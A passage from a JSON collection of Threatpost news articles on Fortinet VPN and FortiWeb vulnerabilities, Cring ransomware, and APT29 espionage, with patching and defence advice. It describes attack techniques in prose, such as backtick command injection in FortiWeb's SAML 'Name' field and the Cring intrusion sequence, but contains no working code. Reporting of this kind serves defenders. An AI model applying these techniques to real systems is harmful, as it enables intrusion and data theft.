is most likely that the attackers, who at this stage controlled the infected system via Cobalt Strike, did this to make it impossible to connect to the infected system remotely via VPN,\u201d he wrote. \u201cThis was done to prevent system administrators from providing a timely response to the information security incident.\u201d\n\nCring proceeds by terminating other application processes in Microsoft Office and Oracle Database software to facilitate encryption as well as the removal of key backup files to prevent recovery of files, according to the report.\n\nIn its final step, Cring starts to encrypt files using strong encryption algorithms so victims can\u2019t decrypt files without knowing the RSA private key held by the attackers, Kopeytsev explained. First each file is encrypted using an AES encryption key and then that key is in turn encrypted using a 8,192-bit RSA public key hard-coded into the malicious program\u2019s executable file, he wrote.\n\nOnce encryption is complete, the malware drops a ransom note from attackers asking for two bitcoins (currently the equivalent of about $114,000) in exchange for the encryption key.\n\n## **Learning from Mistakes**\n\nThe report points out key mistakes made by network administrators in the attack observed by Kaspersky researchers in the hopes that other organizations can learn from them. First the attack highlights once again the importance of keeping systems updated with the latest patches, which could have avoided the incident altogether, Kopeytsev said.\n\n\u201cThe primary causes of the incident include the use of an outdated and vulnerable firmware version on the Fortigate VPN server (version 6.0.2 was used at the time of the attack), which enabled the attackers to exploit the CVE-2018-13379 vulnerability and gain access to the enterprise network,\u201d he wrote.\n\nSystem administrators also left themselves open to attack by not only running an antivirus (AV) system that was outdated, but also by disabling some components of AV that further reduced the level of protection, according to the report.\n\nKey errors in configuring privileges for domain policies and the parameteres of RDP access also came into play in the attack, basically giving attackers free rein once they entered the network, Kopeytsev observed.\n\n\u201cThere were no restrictions on access to different systems,\u201d he wrote. \u201cIn other words, all users were allowed to access all systems. Such settings help attackers to distribute malware on the enterprise network much more quickly, since successfully compromising just one user account provides them with access to numerous systems.\u201d\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _****_[FREE Threatpost event](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _****_[Register here](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_ for the Wed., April 21 LIVE event. _**\n", "cvss3": {}, "published": "2021-04-08T14:00:32", "type": "threatpost", "title": "Hackers Exploit Fortinet Flaw in Sophisticated Cring Ransomware Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379"], "modified": "2021-04-08T14:00:32", "id": "THREATPOST:35A43D6CB9FAF8966F5C0D20045D1166", "href": "https://threatpost.com/hackers-exploit-flaw-cring-ransomware/165300/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-07-16T19:56:37", "description": "The advanced threat actor known as APT29 has been hard at work attempting to pilfer COVID-19 vaccine research from academic and pharmaceutical research institutions in various countries around the world, including the U.S.\n\nThat\u2019s according to a joint alert from the U.S. Department of Homeland Security (DHS), the U.K.\u2019s National Cyber Security Centre (NCSC) and Canada\u2019s Communications Security Establishment (CSE), [issued Thursday](<https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development>).\n\nThe 14-page advisory details the recent activity of Russia-linked APT29 (a.k.a. CozyBear or the Dukes), including the use of custom malware called \u201cWellMess\u201d and \u201cWellMail\u201d for data exfiltration.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThroughout 2020, APT29 has targeted various organizations involved in COVID-19 vaccine development in Canada, the United States and the United Kingdom, highly likely with the intention of stealing information and intellectual property relating to the development and testing of COVID-19 vaccines,\u201d the report noted.\n\nThis specific activity was seen starting in April, but security researchers noted that nation-state espionage targeted to coronavirus treatments and cures [has been a phenomenon all year](<https://threatpost.com/nation-backed-apts-covid-19-spy-attacks/155082/>).\n\n\u201cCOVID-19 is an existential threat to every government in the world, so it\u2019s no surprise that cyber-espionage capabilities are being used to gather intelligence on a cure,\u201d said John Hultquist, senior director of analysis at Mandiant Threat Intelligence, via email. \u201cThe organizations developing vaccines and treatments for the virus are being heavily targeted by Russian, Iranian and Chinese actors seeking a leg up on their own research. We\u2019ve also seen significant COVID-related targeting of governments that began as early as January.\u201d\n\n## **Exploits in Play**\n\nTo mount the attacks, APT29 is using exploits for known vulnerabilities to gain initial access to targets, according to the analysis, along with spearphishing to obtain authentication credentials to internet-accessible login pages for target organizations. The exploits in rotation include the recent [Citrix code-injection bug](<https://threatpost.com/citrix-bugs-allow-unauthenticated-code-injection-data-theft/157214/>) (CVE-2019-19781); a publicized [Pulse Secure VPN flaw](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) (CVE-2019-11510); and issues in FortiGate (CVE-2018-13379) and Zimbra (CVE-2019-9670).\n\n\u201cThe group conducted basic vulnerability scanning against specific external IP addresses owned by the [targeted] organizations,\u201d according to the report. \u201cThe group then deployed public exploits against the vulnerable services identified. The group has been successful using recently published exploits to gain initial footholds.\u201d\n\nOnce a system is compromised, the group then looks to obtain additional authentication credentials to allow further access and spread laterally.\n\n## **Custom Malware**\n\nOnce established in a network, APT29 is employing homegrown malware that the NCSC is calling WellMess and WellMail, to conduct further operations on the victim\u2019s system and exfiltrate data.\n\nWellMess, first discovered in July 2018, is malware that comes in Golang or .NET versions and supports HTTP, TLS and DNS for communications.\n\nNamed after one of the function names in the malware, \u201cWellMess is a lightweight malware designed to execute arbitrary shell commands, upload and download files,\u201d according to the advisory.\n\nWellMail malware meanwhile, named after file paths containing the word \u2018mail\u2019 and the use of server port 25, is also lightweight \u2013 and is designed to run commands or scripts while communicating with a hardcoded command-and-control (C2) server.\n\n\u201cThe binary is an ELF utility written in Golang which receives a command or script to be run through the Linux shell,\u201d according to the NCSC. \u201cTo our knowledge, WellMail has not been previously named in the public domain.\u201d\n\nBoth malwares uses hard-coded client and certificate authority TLS certificates to communicate with their C2 servers.\n\n\u201cWellMess and WellMail samples contained TLS certificates with the hard-coded subjectKeyIdentifier (SKI) \u20180102030406\u2019, and used the subjects \u2018C=Tunis, O=IT\u2019 and \u2018O=GMO GlobalSign, Inc\u2019 respectively,\u201d detailed the report. \u201cThese certificates can be used to identify further malware samples and infrastructure. Servers with this GlobalSign certificate subject may be used for other functions in addition to WellMail malware communications.\u201d\n\nAPT29 is also using another malware, dubbed \u2018SoreFang\u2019 by the NCSC, which is a first-stage downloader that uses HTTP to exfiltrate victim information and download second-stage malware. It\u2019s using the same C2 infrastructure as a WellMess sample, the agencies concluded.\n\nThis sample is not a custom job: \u201cIt is likely that SoreFang targets SangFor devices. Industry reporting indicates that other actors, reportedly including [DarkHotel](<https://threatpost.com/microsoft-zero-day-actively-exploited-patch/152018/>), have also targeted SangFor devices,\u201d noted the NCSC.\n\n## **APT29: A Sporadically High-Profile Threat**\n\n[APT29](<https://attack.mitre.org/groups/G0016/>) has long been seen targeting high-value targets across the think-tank, law enforcement, media, U.S. military, imagery, transportation, pharmaceutical, national government and defense contracting sectors.\n\nThe group is is perhaps best-known for the [intrusion](<https://threatpost.com/dnc-hacked-research-on-trump-stolen/118656/>) at the Democratic National Committee ahead of the U.S. presidential election in 2016. It was also implicated in [a widespread phishing campaign](<https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/>) in November 2016, in attacks against the White House, State Department and Joint Chiefs of Staff.\n\nIt was next seen in November 2017 [executing a Tor backdoor](<https://threatpost.com/apt29-used-domain-fronting-tor-to-execute-backdoor/124582/>), and then [it reemerged](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) in 2018 with a widespread espionage campaign against military, media and public-sector targets.\n\nIts history stretches back a few years though: It [was also seen](<https://threatpost.com/white-house-state-department-counted-among-cozyduke-apt-victims/112382/>) by Kaspersky Lab carrying out data-mining attacks against the White House and the Department of State in 2014.\n\nResearchers from firms [like Mandiant](<https://www.fireeye.com/current-threats/apt-groups/rpt-apt29.html>) believe APT29 to be linked to Russian government-backed operations \u2013 an assessment that the DHS and NCSC reiterated in the latest advisory, saying that it is \u201calmost certainly part of the Russian intelligence services.\u201d\n\nWhile its publicly profiled activity tends to be sporadic, APT29 is rarely at rest, according to Mandiant\u2019s Hultquist.\n\n\u201cDespite involvement in several high-profile incidents, APT29 rarely receives the same attention as other Russian actors because they tend to quietly focus on intelligence collection,\u201d he said via email. \u201cWhereas GRU actors have brazenly leaked documents and carried out destructive attacks, APT29 digs in for the long term, siphoning intelligence away from its target.\u201d\n\nThis latest case is no exception to that M.O., according to the advisory: \u201cAPT29 is likely to continue to target organizations involved in COVID-19 vaccine research and development, as they seek to answer additional intelligence questions relating to the pandemic,\u201d the agencies concluded.\n\nThat said, at least one researcher warned that the end-game of the activity might be more nefarious than simply getting a leg up on a cure.\n\n\u201cAPT29 (Cozy Bear, Office Monkeys) has successfully demonstrated the extension of nation-state power through cyber-action for more than a dozen years,\u201d Michael Daly, CTO at Raytheon Intelligence &amp; Space, said via email. \u201cHowever, they are not focused on simple intellectual property theft. Instead, their focus is rooted in influence operations \u2013 the changing of hearts and minds to thwart and diminish the power of governments and organizations.\u201d\n\nHe added, \u201cIn the case of this breach of vaccine research centers, we should be most concerned not that someone else might also get a vaccine, but that the information will be used to undermine the confidence of the public in the safety or efficacy of the vaccines, slowing their adoption, or in some way cause their release to be delayed. The effect of such a delay would be both impactful to the health of Western populations, but also to the social stability and economic stability of the West.\u201d\n", "cvss3": {}, "published": "2020-07-16T18:05:20", "type": "threatpost", "title": "Hackers Look to Steal COVID-19 Vaccine Research", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670"], "modified": "2020-07-16T18:05:20", "id": "THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB", "href": "https://threatpost.com/state-sponsored-hackers-steal-covid-19-vaccine-research/157514/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-05T19:26:27", "description": "The FBI and the Cybersecurity and Infrastructure Security Agency are warning that advanced persistent threat (APT) nation-state actors are actively exploiting known security vulnerabilities in the Fortinet FortiOS cybersecurity operating system, affecting the company\u2019s SSL VPN products.\n\nAccording to an alert issued Friday by the FBI and CISA, cyberattackers are scanning devices on ports 4443, 8443 and 10443, looking for unpatched Fortinet security implementations. Specifically, APTs are exploiting CVE-2018-13379, CVE-2019-5591 and CVE-2020-12812.\n\n\u201cIt is likely that the APT actors are scanning for these vulnerabilities to gain access to multiple government, commercial and technology services networks,\u201d according to [the alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/fbi-cisa-joint-advisory-exploitation-fortinet-fortios>). \u201cAPT actors have historically exploited critical vulnerabilities to conduct distributed denial-of-service (DDoS) attacks, ransomware attacks, structured query language (SQL) injection attacks, spear-phishing campaigns, website defacements, and disinformation campaigns.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe bug tracked as [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) is a path-traversal issue in Fortinet FortiOS, where the SSL VPN web portal allows an unauthenticated attacker to download system files via specially crafted HTTP resource requests.\n\nThe [CVE-2019-5591](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5591>) flaw is a default-configuration vulnerability in FortiOS that could allow an unauthenticated attacker on the same subnet to intercept sensitive information by impersonating the LDAP server.\n\nAnd finally, [CVE-2020-12812](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12812>) is an improper-authentication vulnerability in SSL VPN in FortiOS, which could allow a user to log in successfully without being prompted for the second factor of authentication (FortiToken) if they changed the case of their username.\n\n\u201cAttackers are increasingly targeting critical external applications \u2013 VPNs have been targeted even more this last year,\u201d said Zach Hanley, senior red team engineer at Horizon3.AI, via email. \u201cThese three vulnerabilities targeting the Fortinet VPN allow an attacker to obtain valid credentials, bypass multifactor authentication (MFA), and man-in-the-middle (MITM) authentication traffic to intercept credentials.\u201d\n\nHanley added, \u201cThe common theme here is: once they are successful, they will look just like your normal users.\u201d\n\nThe bugs are popular with cyberattackers in general, due to Fortinet\u2019s widespread footprint, researchers noted.\n\n\u201cCVE-2018-13379 is a critical vulnerability in the Fortinet FortiOS SSL VPN that has been favored by cybercriminals since exploit details became public in August 2019,\u201d Satnam Narang, staff research engineer at Tenable, said via email. \u201cIn fact, Tenable\u2019s 2020 Threat Landscape Retrospective placed it in our Top 5 Vulnerabilities of 2020 because we see threat actors continue to leverage it in the wild, well over a year after it was first disclosed.\u201d\n\nThe FBI and CISA didn\u2019t specify which APTs are mounting the recent activity.\n\n## Initial Compromise &amp; Recon\n\nOnce exploited, the attackers are moving laterally and carrying out reconnaissance on targets, according to officials.\n\n\u201cThe APT actors may be using any or all of these CVEs to gain access to networks across multiple critical-infrastructure sectors to gain access to key networks as pre-positioning for follow-on data exfiltration or data encryption attacks,\u201d the warning explained. \u201cAPT actors may use other CVEs or common exploitation techniques\u2014such as spear-phishing\u2014to gain access to critical infrastructure networks to pre-position for follow-on attacks.\u201d\n\nThe joint cybersecurity advisory from the FBI and CISA follows last year\u2019s flurry of advisories from U.S. agencies about APT groups using unpatched vulnerabilities to target federal agencies and commercial organizations. For instance, in October [an alert went out](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) that APTs were using flaws in outdated VPN technologies from Fortinet, Palo Alto Networks and Pulse Secure to carry out cyberattacks on targets in the United States and overseas.\n\n\u201cIt\u2019s no surprise to see additional Fortinet FortiOS vulnerabilities like CVE-2019-5591 and CVE-2020-12812 added to the list of known, but unpatched flaws being leveraged by these threat actors,\u201d said Narang. \u201cOver the last few years, SSL VPN vulnerabilities have been an attractive target for APT groups and cybercriminals alike. With the shift to remote work and the increased demand for SSL VPNs like Fortinet and others, the attack surface and available targets have expanded. Organizations should take this advisory seriously and prioritize patching their Fortinet devices immediately if they haven\u2019t done so already.\u201d\n\n## **How Can I Protect My Network from Cyberattacks? **\n\nThe FBI and CISA suggest a range of best practices to help organizations thwart these and other attacks:\n\n * Immediately patch CVEs 2018-13379, 2020-12812 and 2019-5591.\n * If FortiOS is not used by your organization, add key artifact files used by FortiOS to your organization\u2019s execution-deny list. Any attempts to install or run this program and its associated files should be prevented.\n * Regularly back up data, air-gap and password-protect backup copies offline. Ensure copies of critical data are not accessible for modification or deletion from the primary system where the data resides.\n * Implement network segmentation.\n * Require administrator credentials to install software.\n * Implement a recovery plan to restore sensitive or proprietary data from a physically separate, segmented, secure location (e.g., hard drive, storage device, the cloud).\n * Install updates/patch operating systems, software, and firmware as soon as updates/patches are released.\n * Use multifactor authentication where possible.\n * Regularly change passwords to network systems and accounts, and avoid reusing passwords for different accounts. Implement the shortest acceptable timeframe for password changes.\n * Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote access/RDP logs.\n * Audit user accounts with administrative privileges and configure access controls with least privilege in mind.\n * Install and regularly update antivirus and anti-malware software on all hosts.\n * Consider adding an email banner to emails received from outside your organization.\n * Disable hyperlinks in received emails.\n * Focus on awareness and training. Provide users with training on information security principles and techniques, particularly on recognizing and avoiding phishing emails.\n\n**_Check out our free _**[**_upcoming live webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>))\n\n** **\n", "cvss3": {}, "published": "2021-04-02T19:56:57", "type": "threatpost", "title": "FBI: APTs Actively Exploiting Fortinet VPN Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2020-9922"], "modified": "2021-04-02T19:56:57", "id": "THREATPOST:2DFBDDFFE3121143D95705C4EA525C7A", "href": "https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-18T20:47:20", "description": "UPDATE\n\nAn unpatched OS command-injection security vulnerability has been disclosed in Fortinet\u2019s web application firewall (WAF) platform, known as FortiWeb. It could allow privilege escalation and full device takeover, researchers said.\n\nFortiWeb is a cybersecurity defense platform, [aimed at](<https://www.fortinet.com/products/web-application-firewall/fortiweb>) protecting business-critical web applications from attacks that target known and unknown vulnerabilities. The firewall has been to keep up with the deployment of new or updated features, or the addition of new web APIs, according to Fortinet.\n\nThe bug (CVE pending) exists in FortiWeb\u2019s management interface (version 6.3.11 and prior), and carries a CVSSv3 base score of 8.7 out of 10, making it high-severity. It can allow a remote, authenticated attacker to execute arbitrary commands on the system, via the SAML server configuration page, according to Rapid7 researcher William Vu who discovered the bug.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\n\u201cNote that while authentication is a prerequisite for this exploit, this vulnerability could be combined with another authentication-bypass issue, such as [CVE-2020-29015](<https://www.fortiguard.com/psirt/FG-IR-20-124>),\u201d according to a [Tuesday writeup](<https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/>) on the issue.\n\nOnce attackers are authenticated to the management interface of the FortiWeb device, they can smuggle commands using backticks in the \u201cName\u201d field of the SAML Server configuration page. These commands are then executed as the root user of the underlying operating system.\n\n\u201cAn attacker can leverage this vulnerability to take complete control of the affected device, with the highest possible privileges,\u201d according to the writeup. \u201cThey might install a persistent shell, crypto mining software, or other malicious software.\u201d\n\nThe damage could be worse if the management interface is exposed to the internet: Rapid7 noted that attackers could pivot to the wider network in that case. However, Rapid7 researchers identified less than three hundred appliances that appeared to be doing so.\n\nIn the analysis, Vu provided a proof-of-concept exploit code, which uses an HTTP POST request and response.\n\nIn light of the disclosure, Fortinet has sped up plans to release a fix for the problem with FortiWeb 6.4.1 \u2014 originally planned for the end of August, it will now be available by the end of the week.\n\n\u201cWe are working to deliver immediate notification of a workaround to customers and a patch released by the end of the week,\u201d it said in a statement provided to Threatpost.\n\nThe firm also noted that Rapid7\u2019s disclosure was a bit of a surprise given [vulnerability-disclosure norms](<https://threatpost.com/giggle-managing-expectations-vulnerability-disclosure/159039/>) in the industry.\n\n\u201cThe security of our customers is always our first priority. Fortinet recognizes the important role of independent security researchers who work closely with vendors to protect the cybersecurity ecosystem in alignment with their responsible disclosure policies. In addition to directly communicating with researchers, our disclosure policy is clearly outlined on the [Fortinet PSIRT Policy page](<https://www.fortiguard.com/psirt_policy>), which includes asking incident submitters to maintain strict confidentiality until complete resolutions are available for customers. As such, we had expected that Rapid7 hold any findings prior to the end of the our [90-day Responsible disclosure window](<https://www.fortiguard.com/zeroday/responsible-disclosure>). We regret that in this instance, individual research was fully disclosed without adequate notification prior to the 90-day window.\u201d\n\nFor now, Rapid7 offered straightforward advice:\n\n\u201cIn the absence of a patch, users are advised to disable the FortiWeb device\u2019s management interface from untrusted networks, which would include the internet,\u201d according to Rapid7. \u201cGenerally speaking, management interfaces for devices like FortiWeb should not be exposed directly to the internet anyway \u2014 instead, they should be reachable only via trusted, internal networks, or over a secure VPN connection.\u201d\n\nThe Rapid7 researchers said that the vulnerability appears to be related to [CVE-2021-22123](<https://www.fortiguard.com/psirt/FG-IR-20-120>), which was patched in June.\n\n## **Fortinet: Popular for Exploit**\n\nThe vendor [is no stranger](<https://threatpost.com/fortigate-vpn-default-config-mitm-attacks/159586/>) to cybersecurity bugs in its platforms, and Fortinet\u2019s cybersecurity products are popular as exploitation avenues with cyberattackers, including nation-state actors. Users should prepare to patch quickly.\n\nIn April, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) various advanced persistent threats (APTs) were actively exploiting three security vulnerabilities in the Fortinet SSL VPN for espionage. Exploits for CVE-2018-13379, CVE-2019-5591 and CVE-2020-12812 were being used for to gain a foothold within networks before moving laterally and carrying out recon, they warned.\n\nOne of those bugs, a Fortinet vulnerability in FortiOS, [was also seen](<https://threatpost.com/hackers-exploit-flaw-cring-ransomware/165300/>) being used to deliver a new ransomware strain, dubbed Cring, that is targeting industrial enterprises across Europe.\n\n_**This post was updated August 18 at 1:30 p.m. ET with a statement from Fortinet.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-18T12:07:33", "type": "threatpost", "title": "Unpatched Fortinet Bug Allows Firewall Takeovers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2020-29015", "CVE-2021-22123"], "modified": "2021-08-18T12:07:33", "id": "THREATPOST:BE0B5E93BD5FBBCB893FDDFE5348FDE9", "href": "https://threatpost.com/unpatched-fortinet-bug-firewall-takeovers/168764/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-04-16T18:13:10", "description": "The Feds are warning that nation-state actors are once again after U.S. assets, this time in a spate of cyberattacks that exploit five vulnerabilities that affect VPN solutions, collaboration-suite software and virtualization technologies.\n\nAccording to the U.S. National Security Agency (NSA), which issued [an alert Thursday,](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/%20/#pop5008885>) the advanced persistent threat (APT) group [known as APT29](<https://threatpost.com/state-sponsored-hackers-steal-covid-19-vaccine-research/157514/>) (a.k.a. Cozy Bear or The Dukes) is conducting \u201cwidespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials to allow further access.\u201d\n\nThe targets include U.S. and allied national-security and government networks, it added.\n\n[](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)\n\nJoin experts from Digital Shadows (Austin Merritt), Malwarebytes (Adam Kujawa) and Sift (Kevin Lee) to find out how cybercrime forums really work. FREE! Register by clicking above.\n\nThe five bugs under active attack are known, fixed security holes in platforms from Citrix, Fortinet, Pulse Secure, Synacor and VMware (detailed below) that organizations should patch immediately, researchers warned.\n\n\u201cSome of these vulnerabilities also have working Metasploit modules and are currently being widely exploited,\u201d said researchers with Cisco Talos, in a [related posting](<https://blog.talosintelligence.com/2021/04/nsa-svr-coverage.html#more>) on Thursday. \u201cPlease note that some of these vulnerabilities exploit applications leveraging SSL. This means that users should enable SSL decryption\u2026to detect exploitation of these vulnerabilities.\u201d\n\nThe NSA has linked APT29 to Russia\u2019s Foreign Intelligence Services (SVR). The news comes as the U.S. formally attributed the recent [SolarWinds supply-chain attack](<https://threatpost.com/solarwinds-orion-bug-remote-code-execution/163618/>) to the SVR and issued sanctions on Russia for cyberattacks and what President Biden called out as interference with U.S. elections.\n\n## **The 5 Vulnerabilities Being Actively Exploited**\n\nAccording to the NSA, the following are under widespread attack in cyber-espionage efforts:\n\n * CVE-2018-13379 Fortinet FortiGate SSL VPN (path traversal)\n * CVE-2019-9670 Synacor Zimbra Collaboration Suite (XXE)\n * CVE-2019-11510 Pulse Secure Pulse Connect Secure VPN (arbitrary file read)\n * CVE-2019-19781 Citrix Application Delivery Controller and Gateway (directory traversal)\n * CVE-2020-4006 VMware Workspace ONE Access (command injection)\n\n\u201cVulnerabilities in two VPN systems, two virtualization platforms and one collaboration solution seem to be a mighty combo,\u201d Dirk Schrader, global vice president of security research at New Net Technologies, told Threatpost. \u201cFour of them are 12 months or older, which is not a good sign for the overall cyber-hygiene in the U.S., given that all are either rated as severe or even critical in NIST\u2019s NVD. It looks like that adversaries can rely on the lack of diligence related to essential cybersecurity control, even more so in pandemic times.\u201d\n\n## **CVE-2018-13379**\n\nA directory traversal vulnerability in Fortinet FortOS allows unauthenticated attackers to access and download system files, by sending specially crafted HTTP resource requests. \u201cThis can result in the attacker obtaining VPN credentials, which could allow an initial foothold into a target network,\u201d according to Cisco Talos.\n\nThe NSA explained that it arises from an improper limitation of a pathname to a restricted directory. It affects Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12.\n\nThe nation-state issue is ongoing: Earlier in April, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) APTs were actively exploiting the bug.\n\n## **CVE-2019-9670**\n\nThis bug is an XML External Entity Injection (XXE) vulnerability in the mailbox component of the Synacore Zimbra Collaboration Suite. Attackers can exploit it to gain access to credentials to further their access or as an initial foothold into a target network. It affects Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10.\n\n## **CVE-2019-11510**\n\nIn Pulse Secure VPNs, a critical arbitrary file-reading flaw opens systems to exploitation from remote, unauthenticated attackers looking to gain access to a victim\u2019s networks. Attacker can send a specially crafted URI to trigger the exploit. It affects Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4.\n\n\u201cThis can be abused by attackers to access sensitive information, including private keys and credentials,\u201d explained Cisco Talos researchers.\n\nLast April, the Department of Homeland Security (DHS) began urging companies that use Pulse Secure VPNs to change their passwords for Active Directory accounts, after several cyberattacks targeted companies who had previously patched a related flaw in the VPN family.\n\nAt the time, DHS [warned that attackers](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) who have already exploited the flaw to snatch up victims\u2019 credentials were using those credentials to move laterally through organizations, rendering patches useless.\n\nThen September, a successful cyberattack on an unnamed federal agency [was attributed to](<https://threatpost.com/feds-cyberattack-data-stolen/159541/>) exploitation of the bug. \u201cIt is possible the cyber-actor obtained the credentials from an unpatched agency VPN server by exploiting a known vulnerability \u2013 CVE-2019-11510 \u2013 in Pulse Secure,\u201d according to CISA\u2019s alert at the time. \u201cCVE-2019-11510\u2026allows the remote, unauthenticated retrieval of files, including passwords. CISA has observed wide exploitation of CVE-2019-11510 across the federal government.\u201d\n\n## **CVE-2019-19781**\n\nThis critical directory-traversal vulnerability in the Citrix Application Delivery Controller (ADC) and Gateway that can allow remote code-execution. It was first disclosed as a zero-day in December 2019, after which Citrix [rolled out patches](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) amidst dozens of proof-of-concept exploits and skyrocketing exploitation attempts.\n\nIt affects Citrix ADC and Gateway versions before 13.0.47.24, 12.1.55.18, 12.0.63.13, 11.1.63.15 and 10.5.70.12 and SD-WAN WANOP 4000-WO, 4100-WO, 5000-WO, and 5100-WO versions before 10.2.6b and 11.0.3b.\n\n## **C****VE-2020-4006**\n\nAnd finally, a command-injection vulnerability in VMWare Workspace One Access, Access Connector, Identity Manager and Identity Manager Connector allows arbitrary command execution on underlying operating systems. A successful exploit does, however, require valid credentials to the configurator admin account, so it must be chained with another bug to use it.\n\nNonetheless, in December the NSA [warned that](<https://threatpost.com/nsa-vmware-bug-under-attack/161985/>) foreign adversaries were zeroing in on exploiting the flaw, despite patches rolling out just days earlier. State actors were using the bug to pilfer protected data and abuse shared authentication systems, it said.\n\nIt affects VMware One Access 20.01 and 20.10 on Linux, VMware Identity Manager 3.3.1 \u2013 3.3.3 on Linux, VMware Identity Manager Connector 3.3.1 \u2013 3.3.3 and 19.03, VMware Cloud Foundation 4.0 \u2013 4.1, and VMware Vrealize Suite Lifecycle Manager 8.x.\n\n## **How Can I Protect Against Cyberattacks?**\n\nThe NSA recommended several best practices to protect organizations from attack:\n\n * Update systems and products as soon as possible after patches are released.\n * Assume a breach will happen; review accounts and leverage the latest eviction guidance available.\n * Disable external management capabilities and set up an out-of-band management network.\n * Block obsolete or unused protocols at the network edge and disable them in client device configurations.\n * Adopt a mindset that compromise happens: Prepare for incident response activities.\n\n\u201cIf publicly known, patchable exploits still have gas in the tank, this is just an indictment against the status-quo disconnect between many organizations\u2019 understanding of risk and basic IT hygiene,\u201d Tim Wade, technical director on the CTO team at Vectra, told Threatpost. \u201cThe unfortunate reality is that for many organizations, the barrier to entry into their network continues to be low-hanging fruit which, for one reason or another, is difficult for organizations to fully manage.\u201d\n\nHe added, \u201cThis underscores why security leaders should assume that for all the best intentions of their technology peers, compromises will occur \u2013 their imperative is to detect, respond and recover from those events to expel adversaries before material damage is realized.\u201d\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _**[**_FREE Threatpost event_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_, \u201cUnderground Markets: A 